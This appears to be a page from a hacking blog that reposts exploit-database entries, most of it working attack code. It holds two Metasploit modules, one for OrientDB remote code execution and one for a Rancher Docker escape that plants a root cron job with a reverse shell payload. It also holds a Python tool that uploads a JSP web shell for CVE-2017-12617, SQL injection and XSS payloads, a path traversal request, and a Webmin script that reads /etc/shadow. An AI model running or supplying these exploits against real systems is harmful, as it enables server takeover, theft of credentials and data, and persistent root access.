##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'OrientDB 2.2.x Remote Code Execution',
'Description' => %q{
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
All versions from 2.2.2 up to 2.2.22 should be vulnerable.
},
'Author' =>
[
'Francis Alexander - Beyond Security\'s SecuriTeam Secure Disclosure program', # Public PoC
'Ricardo Jorge Borges de Almeida ricardojba1[at]gmail.com', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blogs.securiteam.com/index.php/archives/3318'],
['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'],
['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017']
],
'Platform' => %w{ linux unix win },
'Privileged' => false,
'Targets' =>
[
['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['vbs','certutil']}]
],
'DisclosureDate' => 'Jul 13 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(2480),
OptString.new('USERNAME', [ true, 'HTTP Basic Auth User', 'writer' ]),
OptString.new('PASSWORD', [ true, 'HTTP Basic Auth Password', 'writer' ]),
OptString.new('TARGETURI', [ true, 'The path to the OrientDB application', '/' ])
])
end
def check
uri = target_uri
uri.path = normalize_uri(uri.path)
res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\./
print_good("Version: #{res.headers['Server']}")
return Exploit::CheckCode::Vulnerable
else
print_status("Version: #{res.headers['Server']}")
return Exploit::CheckCode::Safe
end
end
def http_send_command(cmd, opts = {})
# 1 -Create the malicious function
func_name = Rex::Text::rand_text_alpha(5).downcase
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
}
res = send_request_raw(request_parameters)
if not (res and res.code == 201)
begin
json_body = JSON.parse(res.body)
rescue JSON::ParserError
fail_with(Failure::Unknown, 'Failed to create the malicious function.')
return
end
end
# 2 - Trigger the malicious function
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
'data' => ""
}
req = send_request_raw(request_parameters)
if not (req and req.code == 200)
begin
json_body = JSON.parse(res.body)
rescue JSON::ParserError
fail_with(Failure::Unknown, 'Failed to trigger the malicious function.')
return
end
end
# 3 - Get the malicious function id
if res && res.body.length > 0
begin
json_body = JSON.parse(res.body)["@rid"]
rescue JSON::ParserError
fail_with(Failure::Unknown, 'Failed to obtain the malicious function id for deletion.')
return
end
end
func_id = json_body.slice(1..-1)
# 4 - Delete the malicious function
request_parameters = {
'method' => 'DELETE',
'uri' => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => ""
}
rer = send_request_raw(request_parameters)
if not (rer and rer.code == 204)
begin
json_body = JSON.parse(res.body)
rescue JSON::ParserError
fail_with(Failure::Unknown, 'Failed to delete the malicious function.')
return
end
end
end
def java_craft_runtime_exec(cmd)
decoder = Rex::Text.rand_text_alpha(5, 8)
decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
cmd_array = Rex::Text.rand_text_alpha(5, 8)
jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
jcode << "String [] #{cmd_array} = new String[3];\n"
if target['Platform'] == 'win'
jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
jcode << "#{cmd_array}[1] = \"/c\";\n"
else
jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
jcode << "#{cmd_array}[1] = \"-c\";\n"
end
jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
jcode
end
def on_new_session(client)
if not @to_delete.nil?
print_warning("Deleting #{@to_delete} payload file")
execute_command("rm #{@to_delete}")
end
end
def execute_command(cmd, opts = {})
vprint_status("Attempting to execute: #{cmd}")
@uri = target_uri
@uri.path = normalize_uri(@uri.path)
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
if res && res.code == 200 && res.body.length > 0
begin
json_body = JSON.parse(res.body)["databases"]
rescue JSON::ParserError
print_error("Unable to parse JSON")
return
end
else
print_error("Timeout or unexpected response...")
return
end
targetdb = json_body[0]
http_send_command(cmd,targetdb)
end
def linux_stager
cmds = "echo LINE | tee FILE"
exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
base64 = Rex::Text.encode_base64(exe)
base64.gsub!(/\=/, "\\u003d")
file = rand_text_alphanumeric(4+rand(4))
execute_command("touch /tmp/#{file}.b64")
cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
base64.each_line do |line|
line.chomp!
cmd = cmds
cmd.gsub!(/LINE/, line)
execute_command(cmds)
end
execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
execute_command("chmod +x /tmp/#{file}")
execute_command("rm /tmp/#{file}.b64")
execute_command("/tmp/#{file}")
@to_delete = "/tmp/#{file}"
end
def exploit
@uri = target_uri
@uri.path = normalize_uri(@uri.path)
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
if res && res.code == 200 && res.body.length > 0
begin
json_body = JSON.parse(res.body)["databases"]
rescue JSON::ParserError
print_error("Unable to parse JSON")
return
end
else
print_error("Timeout or unexpected response...")
return
end
targetdb = json_body[0]
privs_enable = ['create','read','update','execute','delete']
items = ['database.class.ouser','database.function','database.systemclusters']
# Set the required DB permissions
privs_enable.each do |priv|
items.each do |item|
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => "GRANT #{priv} ON #{item} TO writer"
}
res = send_request_raw(request_parameters)
end
end
# Exploit
case target['Platform']
when 'win'
print_status("#{rhost}:#{rport} - Sending command stager...")
execute_cmdstager(flavor: :vbs)
when 'unix'
print_status("#{rhost}:#{rport} - Sending payload...")
res = http_send_command("#{payload.encoded}","#{targetdb}")
when 'linux'
print_status("#{rhost}:#{rport} - Sending Linux stager...")
linux_stager
end
handler
# Final Cleanup
privs_enable.each do |priv|
items.each do |item|
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => "REVOKE #{priv} ON #{item} FROM writer"
}
res = send_request_raw(request_parameters)
end
end
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863543862
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Rancher Server - Docker Exploit',
'Description' => %q(
Utilizing Rancher Server, an attacker can create a docker container
with the '/' path mounted with read/write permissions on the host
server that is running the docker container. As the docker container
executes command as uid 0 it is honored by the host operating system
allowing the attacker to edit/create files owed by root. This exploit
abuses this to creates a cron job in the '/etc/cron.d/' path of the
host server.
The Docker image should exist on the target system or be a valid image
from hub.docker.com.
Use `check` with verbose mode to get a list of exploitable Rancher
Hosts managed by the target system.
),
'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
'License' => MSF_LICENSE,
'References' => [
'URL' => 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'
],
'Platform' => 'linux',
'Arch' => [ARCH_X64],
'Payload' => { 'Space' => 65000 },
'Targets' => [[ 'Linux', {} ]],
'DefaultOptions' => { 'WfsDelay' => 75, 'Payload' => 'linux/x64/meterpreter/reverse_tcp' },
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 27, 2017'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETENV', [ true, 'Target Rancher Environment', '1a5' ]),
OptString.new('TARGETHOST', [ true, 'Target Rancher Host', '1h1' ]),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
OptString.new('HttpUsername', [false, 'Rancher API Access Key (Username)']),
OptString.new('HttpPassword', [false, 'Rancher API Secret Key (Password)'])
]
)
register_advanced_options(
[
OptString.new('TARGETURI', [ true, 'Rancher API Path', '/v1/projects' ]),
OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
]
)
end
def del_container(rancher_container_id, container_id)
res = send_request_cgi(
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', rancher_container_id),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
return vprint_good('The docker container has been removed.') if res && res.code == 200
print_warning("Manual cleanup of container \"#{container_id}\" is needed on the target.")
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& "
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& "
command << "echo \"\" >> #{echo_cron_path} \&\& "
command << "echo \"* * * * * root #{payload_path}\" >> #{echo_cron_path}"
command
end
def make_container(mnt_path, cron_path, payload_path, container_id)
vprint_status('Setting container json request variables')
{
'instanceTriggeredStop' => 'stop',
'startOnCreate' => true,
'networkMode' => 'managed',
'requestedHostId' => datastore['TARGETHOST'],
'type' => 'container',
'dataVolumes' => [ '/:' + mnt_path ],
'imageUuid' => 'docker:' + datastore['DOCKERIMAGE'],
'name' => container_id,
'command' => make_cmd(mnt_path, cron_path, payload_path),
'entryPoint' => %w[sh -c]
}
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
if res.nil?
print_error('Failed to connect to the target')
return Exploit::CheckCode::Unknown
end
if res.code == 401 && res.headers.to_json.include?('X-Rancher-Version')
print_error('Authorization is required. Provide valid Rancher API Keys.')
return Exploit::CheckCode::Detected
end
if res.code == 200 && res.headers.to_json.include?('X-Rancher-Version')
target_found = false
target_selected = false
environments = JSON.parse(res.body)['data']
environments.each do |e|
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, e['id'], 'hosts'),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
hosts = JSON.parse(res.body)['data']
hosts.each do |h|
target_found = true
result = "Rancher Host \"#{h['hostname']}\" (TARGETHOST #{h['id']}) on "
result << "Environment \"#{e['name']}\" (TARGETENV #{e['id']}) found"
# flag results when this host is targeted via options
if datastore['TARGETENV'] == e['id'] && datastore['TARGETHOST'] == h['id']
target_selected = true
vprint_good(result + ' %red<-- targeted%clr')
else
vprint_good(result)
end
end
end
if target_found
return Exploit::CheckCode::Vulnerable if target_selected
print_bad("Your TARGETENV \"#{datastore['TARGETENV']}\" or/and TARGETHOST \"#{datastore['TARGETHOST']}\" is not available")
if datastore['VERBOSE'] == false
print_bad('Try verbose mode to know what happened.')
end
vprint_bad('Choose a TARGETHOST and TARGETENV from the results above')
return Exploit::CheckCode::Appears
else
print_bad('No TARGETHOST available')
return Exploit::CheckCode::Detected
end
end
Exploit::CheckCode::Safe
end
def exploit
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, 'Failed to connect to the target')
end
# create required information to create json container information
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id
# deploy docker container
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers'),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' },
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
)
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res && res.code == 201
print_good('The docker container is created, waiting for it to deploy')
# cleanup
register_files_for_cleanup(cron_path, payload_path)
rancher_container_id = JSON.parse(res.body)['id']
deleted_container = false
sleep_time = 5
wait_time = datastore['WAIT_TIMEOUT']
vprint_status("Waiting up to #{wait_time} seconds until the docker container stops")
while wait_time > 0
sleep(sleep_time)
wait_time -= sleep_time
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', '?name=' + container_id),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
next unless res && res.code == 200 && res.body.include?('stopped')
vprint_good('The docker container has stopped, now trying to remove it')
del_container(rancher_container_id, container_id)
deleted_container = true
wait_time = 0
end
# if container does not deploy, try to remove it and fail out
unless deleted_container
del_container(rancher_container_id, container_id)
fail_with(Failure::Unknown, "The docker container failed to start")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end
#!/usr/bin/python
import requests
import re
import signal
from optparse import OptionParser
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
banner="""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
"""
def signal_handler(signal, frame):
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
exit()
signal.signal(signal.SIGINT, signal_handler)
def removetags(tags):
remove = re.compile('<.*?>')
txt = re.sub(remove, '\n', tags)
return txt.replace("\n\n\n","\n")
def getContent(url,f):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
re=requests.get(str(url)+"/"+str(f), headers=headers)
return re.content
def createPayload(url,f):
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
if req.status_code==201:
print ("File Created ..")
def RCE(url,f):
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
def shell(url,f):
while True:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
cmd=input("$ ")
payload={'cmd':cmd}
if cmd=="q" or cmd=="Q":
break
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
re=str(re.content)
t=removetags(re)
print (t)
#print bcolors.HEADER+ banner+bcolors.ENDC
parse=OptionParser(
bcolors.HEADER+"""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
[@intx0x80]
"""+bcolors.ENDC
)
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
(opt,args)=parse.parse_args()
if opt.U==None and opt.P==None and opt.L==None:
print(parse.usage)
exit(0)
else:
if opt.U!=None and opt.P==None and opt.L==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
url=str(opt.U)
checker="Poc.jsp"
print (bcolors.BOLD +"Poc Filename {}".format(checker))
createPayload(str(url)+"/",checker)
con=getContent(str(url)+"/",checker)
if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
else:
print ('Not Vulnerable to CVE-2017-12617 ')
elif opt.P!=None and opt.U!=None and opt.L==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
pwn=str(opt.P)
url=str(opt.U)
print ("Uploading Webshell .....")
pwn=pwn+".jsp"
RCE(str(url)+"/",pwn)
shell(str(url),pwn)
elif opt.L!=None and opt.P==None and opt.U==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
w=str(opt.L)
f=open(w,"r")
print ("Scaning hosts in {}".format(w))
checker="Poc.jsp"
for i in f.readlines():
i=i.strip("\n")
createPayload(str(i)+"/",checker)
con=getContent(str(i)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
# Exploit Title: ClipShare v7.0 - SQL Injection
# Date: 2017-10-09
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.clip-share.com/
# Software Link: http://www.clip-share.com/
# Version: 7.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-09
Product & Service Introduction:
===============================
ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites.
Technical Details & Description:
================================
SQL injection on [category] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: Typo3 Restler Extension - Local File Disclosure
# Date: 2017-10-13
# Exploit Author: CrashBandicot @dosperl
# Vendor Homepage: https://www.aoe.com/
# Software Link: https://extensions.typo3.org/extension/restler/
# Tested on : MsWin
# Version: 1.7.0 (last)
# Vulnerability File : getsource.php
3. $file = $_GET['file'];
13. $text = file_get_contents($file);
16. die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");
# PoC :
# http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
# https://i.imgur.com/zObmaDD.png
# Timeline :
# Vulnerability identified
# Vendor notified
# CVE number requested
# Exploit released
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14619
1. Description
Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows
remote attackers to inject arbitrary web script or HTML via the "Title of
your FAQ" field in the Configuration Module.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619
https://securityprince.blogspot.fr/2017/10/cve-2017-14619-phpmyfaq-298-cross-site_92.html
2. Proof of Concept
Steps to Reproduce:
1. Open the affected link http://localhost/phpmyfaq/admin/?action=config
with logged in user with administrator privileges
2. Enter the <marquee onscroll=alert(document.cookie)> in the “Title of
your FAQ field”
3. Save the Configuration
4. Login using any other user or simply click on the phpMyFAQ on the
top-right hand side of the web portal
3. Solution:
The Vulnerability will be fixed in the next release of phpMyFAQ
# Exploit Title: Vulnerability XSS - Dreambox
# Shodan Dork: Dreambox 200
# Date: 12/10/2017
# Exploit Author: Thiago "THX" Sena
# Vendor Homepage: https://www.dreamboxupdate.com
# Version: 2.0.0
# Tested on: kali linux, windows 7, 8.1, 10
# CVE : CVE-2017-15287
Vulnerabilty: Cross-site scripting (XSS) in plugin BouquetEditor
---------------------------------------------------------------
PoC:
- First you go to ( http://IP:PORT/bouqueteditor/ )
- Then you go to the Bouquets tab, add a new bouquet
- Then put the script (<script>alert(1)</script>)
- Xss Vulnerability
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin version 1.850
Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS,
file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from
the console or remotely. See the standard modules page for a list of all the functions built into Webmin.”
The vulnerabilities found are:
XSS vulnerability that leads to Remote Code Execution
CSRF Schedule arbitrary commands
Server Side Request Forgery
Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
The vendor has released patches to address these vulnerabilities.
For more information: https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9 and http://www.webmin.com/security.html
Vulnerability details
XSS vulnerability that leads to Remote Code Execution
Under Webmin menu ‘Others/File Manager‘ there is option to download a file from a remote server ‘Download from remote URL‘.
By setting up a malicious server we can wait for file download request then send a XSS payload that will lead to Remote Code Execution.
Webmin echo back the ‘File Download‘ request status which we can trigger the XSS vulnerability and bypass this Referrer check by setting the
domain=webmin-victim-ip.
Proof of Concept
import socket
#===================================================
#Run this script and listen for file download from webmin
#Enter payload to execute RCE
#wait for webmin to connect and download file
#Vulnerability is in Menu/Others/File Manager
#issue is webmin echoes back status of the download
#by injecting XSS we bypass the Referer: check by assign
#domain to victims own IP, then execute our RCE
#-----------------------------------------------------------
#e.g.
#Download from remote URL
#http://x.x.x.x:10000/shell/index.cgi
#> whoami
#root
PORT=int(raw_input("[PORT]> ")) #port we listen on for file download requests
WEBMIN_IP=raw_input("[Webmin IP]> ") #victim
#Read /etc/shadow file
CMD=("/><script>document.domain='http://"+WEBMIN_IP+":10000/shell/index.cgi'</script>"+
"<form action='https://"+WEBMIN_IP+":10000/shell/index.cgi' method='POST' enctype='multipart/form-data'>"+
"<input type='hidden' name='cmd' value='cat /etc/shadow'><script>document.forms[0].submit()</script></form>")
s = socket.socket()
HOST = ''
s.bind((HOST, PORT))
s.listen(5)
print '\nwebmin file download 0day...'
while True:
conn, addr = s.accept()
conn.send(CMD+'\r\n')
print 'Connected!'
print s.recv(1024)
conn.close()
s.close()
CSRF Schedule arbitrary commands
User controlled input is not sufficiently sanitized, by sending GET request to create_job.cgi with the following parameter dir=/&cmd=ls
an attacker to execute arbitrary commands.
Proof of Concept
http://x.x.x.x:10000/at/create_job.cgi?user=root&day=31&month=7&year=2017&hour=2&min=00&dir=/&cmd=ls -lt&mail=0
Server Side Request Forgery
User controlled input is not sufficiently sanitized, by sending GET request to tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can trigger
the vulnerability
Proof of Concept
http://x.x.x.x:10000/tunnel/link.cgi/http://VICTIM-IP:8000
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
====================
Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3430
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
1. ADVISORY INFORMATION
=======================
Product: AlienVault USM
Vendor URL: https://www.alienvault.com
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2017-09-22
Date published: 2017-10-13
CVSSv3 Score: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14956
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AlienVault USM 5.4.2 (current)
older versions may be affected too.
4. INTRODUCTION
===============
AlienVault Unified Security Management (USM) is a comprehensive approach to
security monitoring, delivered in a unified platform. The USM platform includes
five essential security capabilities that provide resource-constrained
organizations with all the security essentials needed for effective threat
detection, incident response, and compliance, in a single pane of glass.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
AlienVault USM v5.4.2 offers authenticated users the functionality to generate
and afterwards export generated compliance reports via the script located at
"/ossim/report/wizard_email.php". Besides offering an export via a local file
download, the script does also offer the possibility to send out any report via
email to a given address (either in PDF or XLSX format).
An exemplary request to send the pre-defined report
"PCI_DSS_3_2__Vulnerability_Details" to the email address "email () example com"
looks like the following:
https://example.com/ossim/report/wizard_email.php?extra_data=1&name=UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==&format=email&pdf=true&email=email
() example com
The base64-encoded HTTP GET "name" parameter can be replaced with any other
of the approx. 240 pre-defined reports, that are shipped with AlienVault USM
since they do all have hardcoded identifiers, such as:
- Alarm_Report
- Ticket_Report
- Business_and_Compliance
- HIPAA_List_of_identified_ePHI_assets
- PCI_DSS_3_2_Database_Users_Added
- VulnerabilitiesReport
etc.
Since there is no anti-CSRF token protecting this functionality, it is
vulnerable to Cross-Site Request Forgery attacks. An exemplary exploit to send
the "PCI_DSS_3_2__Vulnerability_Details" report as a PDF-file to
"email () example com" could look like the following:
<html>
<body>
<form action="https://example.com/ossim/report/wizard_email.php";>
<input type="hidden" name="extra_data" value="1" />
<input type="hidden" name="name" value="UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==" />
<input type="hidden" name="format" value="email" />
<input type="hidden" name="pdf" value="true" />
<input type="hidden" name="email" value="email@example.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
